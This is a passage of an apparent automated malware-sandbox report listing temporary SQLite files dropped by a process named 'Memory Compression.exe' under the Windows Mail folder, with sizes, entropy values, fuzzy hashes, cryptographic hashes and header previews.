                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\l3GKRu3QOZ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\l9R2ZYhVpi

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\lKTtGPHXMq

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\mpZX7ysHYh

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\msdhnthH4H

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\muhVeiUa7p

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\myVEKtUkPj

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\n0vGtRDvKh

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\oH7k40WwDk

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):98304
                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\oWNFtm3WjJ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\owqvSgdRDl

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\pRdxDHVrMZ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\pdrUqFQuoJ

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\pjmYOlFqch

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ptJdfv7hwk

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\pv253MkKeL

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\q1apX6talG

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\qFIPrATNh5

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\qQph2sm5Rw

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\qWkvpLtFSG

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\qb7dxZ0Cnv

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\qmQKzWmr2C

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
